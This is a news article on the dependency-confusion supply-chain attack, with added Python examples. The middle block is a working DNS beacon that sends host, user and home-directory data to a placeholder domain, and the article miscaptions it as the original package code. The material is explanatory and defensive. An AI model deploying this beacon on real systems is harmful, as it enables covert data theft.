A researcher managed to break into the internal systems of over 35 large companies, including Microsoft, Apple, PayPal, Shopify, Netflix, Yelp, Tesla and Uber, in a novel attack on the software supply chain.
The attack involved uploading malicious packages to open source registries, including PyPI, npm and RubyGems, from where they were automatically pulled downstream into the companies' internal applications.
Unlike traditional typosquatting attacks, which rely on social engineering or on the victim misspelling a package name, this supply chain attack is more sophisticated in that it required no action from the victim, who received the malicious packages automatically.
This is because the attack exploited a design flaw in open source ecosystems called dependency confusion.
For his ethical research efforts, the researcher has earned well over $130,000 in bug bounties.
Malware is automatically distributed downstream
Last year, security researcher Alex Birsan came up with the idea while working with another researcher, Justin Gardner.
Gardner had shared a manifest file, package.json, from an npm package used internally by PayPal.
Birsan noticed that some of the packages listed in the manifest were not present in the public npm registry; they were private PayPal npm packages, used and hosted internally by the company.
Seeing this, the researcher wondered: if a package with the same name existed in the public npm registry as well as in the private NodeJS registry, which one would be given priority?
To test this hypothesis, Birsan began searching for names of private internal packages, found in manifest files in GitHub repositories or in prominent companies' CDNs, that did not exist in any public open source registry.
The researcher then created projects with those same names in public open source registries such as npm, PyPI and RubyGems.
Each package Birsan published was uploaded under his real account and carried a clear disclaimer, which read: "This package is intended for security research purposes and contains no useful code."
Birsan soon found that if a dependency used by an application exists in both a public open source registry and a private registry, the public package is given priority and pulled instead, without the developer having to do anything.
In some cases, as with PyPI packages, the researcher noted that the package with the higher version number is prioritized regardless of which index it comes from.
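To make the priority rule concrete, here is an added example in Python (not code from the article, from Birsan, or from any package manager) that models the two resolution policies side by side. The index contents and the acme-* package names are constructed. The first function mirrors pip's pooled, highest-version-wins behaviour when a public index is added with --extra-index-url; the second models a single private index that proxies the public one and refuses to proxy a reserved internal prefix, which is one of the client-side reconfigurations the article says the fix has to consist of.

```python
"""Model of how a package installer chooses between a private and a public
index. Added example; not code from the article, from Birsan, or from pip or
npm. Index contents below are constructed and the acme-* names are
hypothetical."""

# Constructed sample data: versions each index would advertise for a name.
PRIVATE_INDEX = {
    "acme-internal-utils": ["0.3.1", "0.4.0"],   # hypothetical internal package
}
PUBLIC_INDEX = {
    "acme-internal-utils": ["99.0.0"],           # squat of the internal name, higher version
    "requests": ["2.25.1"],                      # ordinary public package
}


def version_key(version: str) -> tuple:
    """Numeric ordering for dotted versions (simplified: no pre-release tags)."""
    return tuple(int(part) for part in version.split("."))


def resolve_extra_index(name, private=PRIVATE_INDEX, public=PUBLIC_INDEX):
    """Mirrors `pip install --index-url <private> --extra-index-url <public>`:
    candidates from every index are pooled and the highest version wins, so a
    public package with a bigger version number beats the internal one.
    Returns (version, source)."""
    candidates = [(v, "private") for v in private.get(name, [])]
    candidates += [(v, "public") for v in public.get(name, [])]
    if not candidates:
        raise LookupError(f"{name}: not found on any index")
    # max() keeps the first maximal element, so an exact tie favours the private copy
    return max(candidates, key=lambda c: version_key(c[0]))


def resolve_single_index(name, private=PRIVATE_INDEX, public=PUBLIC_INDEX,
                         reserved_prefix="acme-"):
    """Hardened policy: the client is configured with exactly one index, a
    private registry that proxies the public one. Names under the reserved
    internal prefix are never proxied, so a public squat of an internal name
    is unreachable; any other name falls through to the public index only
    when the private registry does not host it. Returns (version, source)."""
    if name in private:
        return max(private[name], key=version_key), "private"
    if name.startswith(reserved_prefix):
        raise LookupError(f"{name}: reserved internal name is not hosted privately "
                          "and will not be fetched from the public index")
    if name in public:
        return max(public[name], key=version_key), "public"
    raise LookupError(f"{name}: not found")


if __name__ == "__main__":
    for pkg in ("acme-internal-utils", "requests"):
        print(pkg, "extra-index  ->", resolve_extra_index(pkg))
        print(pkg, "single-index ->", resolve_single_index(pkg))
```

The npm equivalent of the reserved prefix is an npm scope pinned to the private registry in .npmrc (`@acme:registry=https://<private-registry>/`), and artifact managers such as Nexus and Artifactory expose the "never proxy this pattern" rule as an exclusion pattern on the proxy repository. Whichever tool is used, the property to check is the one the second function enforces: no request for an internal name can ever reach the public registry.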
Using this technique, Birsan carried out successful supply chain attacks against Microsoft, Apple, PayPal, Shopify, Netflix, Tesla, Yelp and Uber simply by publishing public packages with the same names as the companies' internal ones.
"I think dependency confusion is quite different from typosquatting or brandjacking, as it does not necessarily require any kind of manual input from the victim."
"Rather, vulnerabilities or design flaws in automated build or installation tools can lead to public dependencies being confused with internal dependencies of the exact same name," Birsan told BleepingComputer in an email interview.
Recon and data exfiltration over DNS
The packages contained a preinstall script that ran automatically as soon as the build process pulled the package in, exfiltrating identifying information about the machine.
Knowing that his scripts would be calling back from inside corporate networks, Birsan chose DNS as the exfiltration channel to evade detection.
"Knowing that most of the potential targets would be deep inside well-protected corporate networks, I thought DNS exfiltration was the way to go," Birsan says in his blog post.
The code excerpt shown below is from the counterfeit npm package "analytics-paypal", which has since been removed from npm. As a security researcher at Sonatype, however, I was able to retrieve it from our automated malware detection archives.
This script runs automatically as soon as the analytics-paypal dependency is pulled in and contains code that makes DNS requests to dns.alexbirsan-hacks-paypal.com.
The callback received from PayPal's systems would then have told the researcher that the IP address making the request belonged to PayPal, along with the username and home directory of the affected system.
Once Birsan received such callbacks and had sufficiently confirmed that his counterfeit component had made it into the corporate network, he reported the findings to the company in question and earned a bug bounty.
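The callback mechanism, as an added Python reconstruction of the technique described above; this is not the code from the analytics-paypal package and is not reproduced from it. Identifying fields (hostname, username, home directory) are packed into DNS query names under a domain the researcher controls, split into labels that respect the 63-character label and 253-character name limits, and reassembled on the receiving side. The domain dns.example.test is a placeholder and the field values used when testing are constructed; the block only prints the queries it would send unless send_beacon is called explicitly.

```python
"""DNS-based callback of the kind the article describes: identifying facts
about the host are packed into DNS query names under a domain the researcher
controls. Added example; a reconstruction of the technique, not the code
from the analytics-paypal package. The domain is a placeholder."""
import base64
import getpass
import json
import os
import socket

MAX_LABEL = 63              # RFC 1035 limit per label
MAX_NAME = 253              # practical limit for a full name
DATA_LABELS_PER_QUERY = 2   # 2 * 63 + header + domain stays well under MAX_NAME


def collect_fields() -> dict:
    """What a preinstall hook gathers: enough to prove which organization,
    user and home directory the package was installed under."""
    return {"host": socket.gethostname(), "user": getpass.getuser(),
            "home": os.path.expanduser("~")}


def encode_beacon(fields: dict, domain: str) -> list:
    """Serialise fields to JSON, base32-encode them (DNS is case-insensitive,
    and base32 survives lower-casing), split into 63-char labels and group the
    labels into queries. Each query carries an 'index-total' header label so
    the receiver can reassemble the payload even if queries arrive out of order."""
    raw = json.dumps(fields, separators=(",", ":")).encode()
    b32 = base64.b32encode(raw).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    groups = [labels[i:i + DATA_LABELS_PER_QUERY]
              for i in range(0, len(labels), DATA_LABELS_PER_QUERY)]
    queries = [f"{i}-{len(groups)}." + ".".join(g) + "." + domain
               for i, g in enumerate(groups)]
    for q in queries:
        if len(q) > MAX_NAME:
            raise ValueError("callback domain too long for this chunking")
    return queries


def decode_beacon(queries, domain: str) -> dict:
    """Receiver side (authoritative server log or passive DNS): strip the
    domain, order the chunks by their header label, re-pad and decode."""
    suffix = "." + domain
    chunks, total = {}, None
    for q in queries:
        if not q.endswith(suffix):
            raise ValueError(f"unexpected name {q}")
        labels = q[:-len(suffix)].split(".")
        idx, total = (int(x) for x in labels[0].split("-"))
        chunks[idx] = "".join(labels[1:])
    if total is None or len(chunks) != total:
        raise ValueError("incomplete beacon")
    b32 = "".join(chunks[i] for i in range(total)).upper()
    b32 += "=" * (-len(b32) % 8)          # restore the padding stripped on encode
    return json.loads(base64.b32decode(b32))


def send_beacon(queries) -> None:
    """Fire the queries. The answer is irrelevant: the lookup itself, logged
    by the authoritative server, is the signal. Not called on import."""
    for q in queries:
        try:
            socket.getaddrinfo(q, None)
        except socket.gaierror:
            pass   # NXDOMAIN is expected; the authoritative server has already seen it


if __name__ == "__main__":
    qs = encode_beacon(collect_fields(), "dns.example.test")
    for q in qs:
        print(q)                                   # shown instead of sent
    print(decode_beacon(qs, "dns.example.test"))
```

From the defender's side, the same structure is the detection signature: a burst of queries to one previously unseen zone whose leading labels are long, fixed-alphabet strings that never resolve. A build agent that needs no internet access other than its package proxy should not be able to resolve arbitrary external names at all, which is the cheapest control against this channel.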
Earned over $130,000 in bounties
In total, the researcher earned over $130,000 in rewards through bug bounty programs and pre-approved penetration testing arrangements.
"I feel it is important to make it clear that every single organization targeted during this research has given permission to have its security tested, either through public bug bounty programs or through private agreements. Do not try this kind of testing without authorization," warns Birsan.
For Birsan's disclosure, Microsoft awarded him its maximum bounty of $40,000 and released a white paper on this security issue. Microsoft tracks the issue as CVE-2021-24105 for its Azure Artifacts product.
However, Microsoft told Birsan in an email that they consider this a design flaw in package managers.
"While we treat this as a serious security issue, it must ultimately be resolved by reconfiguring installation tools and workflows, and not by correcting anything in the package repositories themselves."
“To address this issue, Microsoft has made minor improvements to Azure Artifacts to ensure that it can be used as a trusted solution.”
“That said, we consider the root cause of this issue to be a design flaw (rather than a bug) in package managers that can only be addressed through reconfiguration,” a Microsoft spokesman said in the email.
In a statement to BleepingComputer, Yelp confirmed the researcher’s report and rewarded him after fixing the issue within a day.
"Through Yelp's bug bounty program, Alex Birsan helped us identify a vulnerability, which we immediately patched within a day."
"We are committed to working with security experts to stay up to date with the latest security techniques, and rely on our bug bounty program to reward skilled security researchers who help improve Yelp's systems and services," a Yelp spokesperson told BleepingComputer.
Apple has told BleepingComputer that Birsan will be rewarded through the Apple Security Bounty program for responsibly disclosing this issue.
PayPal, meanwhile, has now disclosed Birsan's HackerOne report, which lists the $30,000 bounty amount.
However, the researcher’s ethical research efforts have not been embraced by everyone.
"I'm thinking this [is] probably reason enough not to have these projects on PyPI," said Dustin Ingram, Director of the Python Software Foundation and a Developer Advocate at Google, who investigated and removed some of Birsan's packages from PyPI.
After spending about an hour taking these packages down, Ingram stressed that uploading illegitimate packages to PyPI puts an unnecessary burden on the volunteers who maintain PyPI.
"If you are ultimately interested in protecting users from this type of attack, there are better ways to do it that protect the entire ecosystem, not just a specific set of organizations with bug bounties," Ingram added.
Attacks are expected to grow; a difficult problem to solve
Through this research spanning large organizations, Birsan says he has made prominent technology companies aware of this type of attack, and they have since implemented some form of mitigation across their infrastructure. However, the researcher believes there is more to discover.
The possibility remains that such attacks will emerge and grow, especially as open source platforms have no simple fix for dependency confusion.
"In particular, I believe that finding new and smart ways to leak internal package names will reveal even more vulnerable systems, and looking at alternative programming languages and repositories to target will reveal some extra attack surface for dependency confusion bugs," the researcher concluded in his blog post.
Sonatype has released a script on GitHub that Nexus Repository Manager users can run to check whether any of their private dependencies share a name with existing packages on the public npm, RubyGems and PyPI registries. Companies using other artifact managers can build similar checks.
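An added example, not Sonatype's script, of the kind of check described above, written in Python. It goes slightly beyond a plain name comparison: it normalizes names the way the registry does (PEP 503 folds case and treats `-`, `_` and `.` as equivalent on PyPI, so a private `Acme_Internal.Utils` collides with a public `acme-internal-utils`), and it reports not only names already taken publicly but also names that are still unclaimed and therefore claimable by anyone tomorrow. The registry metadata URLs are the real public endpoints; the private name list and the offline lookup table used when running the block are constructed, and the RubyGems exact-match rule is an assumption.

```python
"""Check whether the names of private dependencies exist, or could be
registered, on the public registries. Added example; not Sonatype's script.
The private name list and the offline lookup table are constructed."""
import re
import urllib.error
import urllib.request

REGISTRY_URL = {   # public metadata endpoints; a 404 means the name is unclaimed
    "pypi": "https://pypi.org/pypi/{}/json",
    "npm": "https://registry.npmjs.org/{}",
    "rubygems": "https://rubygems.org/api/v1/gems/{}.json",
}


def normalize(ecosystem: str, name: str) -> str:
    """Normalise the way the registry does, so that 'Foo_Bar' and 'foo-bar'
    are the same PyPI project (PEP 503). npm names are lower-case. RubyGems
    names are compared as-is (assumption: exact-name matching)."""
    if ecosystem == "pypi":
        return re.sub(r"[-_.]+", "-", name).lower()
    if ecosystem == "npm":
        return name.lower()
    return name


def exists_on_public_registry(ecosystem: str, name: str) -> bool:
    """Live lookup (needs network). Any 2xx means someone already owns the name."""
    url = REGISTRY_URL[ecosystem].format(name.replace("/", "%2F"))
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return 200 <= resp.status < 300
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise


def classify_private_names(private_names: dict, lookup=exists_on_public_registry) -> dict:
    """For {ecosystem: [internal names]} return {ecosystem: {name: status}} where
    status is one of:
      'collision' - the name is already taken publicly; confusion is possible now
      'claimable' - unclaimed today, but anyone could publish it tomorrow
      'scoped'    - an npm @scope/name; safe only if the @scope is owned on npmjs
    """
    report = {}
    for ecosystem, names in private_names.items():
        report[ecosystem] = {}
        for name in names:
            if ecosystem == "npm" and name.startswith("@"):
                status = "scoped"
            elif lookup(ecosystem, normalize(ecosystem, name)):
                status = "collision"
            else:
                status = "claimable"
            report[ecosystem][name] = status
    return report


# Constructed stand-in for the public registries so the block runs offline;
# swap in exists_on_public_registry for a live scan.
OFFLINE_PUBLIC = {("pypi", "acme-internal-utils"), ("npm", "acme-build-helpers")}


def offline_lookup(ecosystem: str, name: str) -> bool:
    return (ecosystem, name) in OFFLINE_PUBLIC


if __name__ == "__main__":
    # Constructed list of the kind a leaked package.json or requirements file reveals.
    private = {"pypi": ["Acme_Internal.Utils", "acme_secret_lib"],
               "npm": ["acme-build-helpers", "@acme/core"],
               "rubygems": ["acme_gem"]}
    for ecosystem, statuses in classify_private_names(private, lookup=offline_lookup).items():
        for name, status in statuses.items():
            print(f"{ecosystem:9} {name:24} {status}")
```

A 'claimable' result is not a clean bill of health: it is the state every one of the packages in this article was in before Birsan published them. The durable fix is the one the article's Microsoft statement points at, reconfiguring the install tools so that internal names are served only from the private registry, with the name scan used to find out how much exposure there is in the meantime.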
BleepingComputer contacted the companies mentioned in this report ahead of publication, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla, Yelp and Uber. We have published the statements from the companies that responded before press time.
Update February 10, 2021 16:30 ET: Added links to the HackerOne reports for PayPal and Yelp, disclosed after press time.